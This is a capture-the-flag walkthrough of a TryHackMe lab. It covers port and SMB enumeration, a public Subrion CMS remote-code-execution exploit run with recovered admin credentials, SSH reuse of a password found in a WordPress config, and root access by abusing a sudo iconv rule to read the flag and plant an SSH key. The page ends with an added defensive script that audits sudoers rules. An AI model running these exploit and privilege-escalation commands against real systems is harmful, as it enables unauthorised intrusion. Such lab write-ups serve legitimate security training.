Room Link: https://tryhackme.com/room/techsupp0rt1
Initial Scan
Kali
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Gobuster didn't find anything, and the home page was just the default Ubuntu page. I couldn't find anything of interest.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/445 - SMB
Kali
smbclient -L //$VICTIM/
smbclient \\\\$VICTIM\\websvr
smb: \> ls
smb: \> prompt
smb: \> mget *
I used CyberChef and it was able to decode the creds.
TCP/80 - HTTP
I was able to access the Subrion page from panel, as mentioned in the message, as Subrion by itself doesn't work.
Username: admin
Password: Scam2021
Shell
Exploit: https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE
Since it's using Subrion CMS v4.2.1, I looked for exploits and found one for an RCE.
sudo apt-get install python3-bs4
git clone https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE.git
cd CVE-2018-19422-SubrionCMS-RCE/
sudo python3 SubrionRCE.py -u http://$VICTIM/subrion/panel/ -l admin -p Scam2021
Victim
cat /var/www/html/wordpress/wp-config.php
The hacker reused the password for both WordPress and SSH.
Kali
ssh scamsite@$VICTIM
Password: ImAScammerLOL!123!
Option #1
Just get flag
LFILE=/root/root.txt
sudo iconv -f 8859_1 -t 8859_1 "$LFILE"
Privilege Escalation
Kali
ssh-keygen -t rsa
cat ~/.ssh/id_rsa.pub
Victim
LFILE=/root/.ssh/authorized_keys
echo "$YOURKEY" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE"
Kali
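The privilege escalation above works because the scamsite account can run iconv through sudo, which amounts to reading and writing any file as root. As an added example (not part of the original write-up), the script below audits sudoers-style rules for that class of grant; the rule lines, the other account names and the short utility list are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: flag sudo rules that grant root file read/write through a
# file-copying utility, the way the iconv rule on this page does.

# Utilities that copy a file to stdout or to a chosen path (illustrative,
# not exhaustive). iconv is the one used in this write-up.
RISKY="iconv cat tee dd cp base64 xxd"

# Reads sudoers-style lines on stdin, prints "user:command" per risky grant.
# Cmnd_Alias/User_Alias definitions are skipped, not expanded.
audit_sudoers() {
  awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    NF == 0 || $1 ~ /^#/ { next }               # blank lines and comments
    $1 ~ /^Defaults/ || $1 ~ /_Alias$/ { next } # settings and alias definitions
    {
      who = $1; spec = $0
      sub(/^[^=]*=[ \t]*/, "", spec)            # drop the user and host part
      gsub(/\([^)]*\)/, "", spec)               # drop (runas) specs
      gsub(/(NOPASSWD|PASSWD|NOEXEC|SETENV):/, "", spec)   # drop tags
      m = split(spec, cmds, ",")
      for (i = 1; i <= m; i++) {
        c = cmds[i]; gsub(/^[ \t]+|[ \t]+$/, "", c)
        split(c, parts, " "); path = parts[1]
        base = path; sub(/.*\//, "", base)      # basename of the command
        if (path == "ALL" || (base in bad)) print who ":" path
      }
    }'
}

# Constructed sample rules; the room's real sudoers file is not on the page.
sample_rules() {
  cat <<'EOF'
# constructed sudoers fragment
Defaults env_reset
scamsite ALL=(ALL) NOPASSWD: /usr/bin/iconv
backup   ALL=(root) /usr/bin/du -sh /var/backups, /usr/bin/tee /var/log/backup.log
deploy   ALL=(root) NOPASSWD: /usr/sbin/service nginx restart
ops      ALL=(ALL:ALL) ALL
EOF
}

sample_rules | audit_sudoers
```

On a host being reviewed, feed the function the contents of /etc/sudoers and /etc/sudoers.d/ on stdin. Any hit should be replaced with a narrowly scoped wrapper or removed.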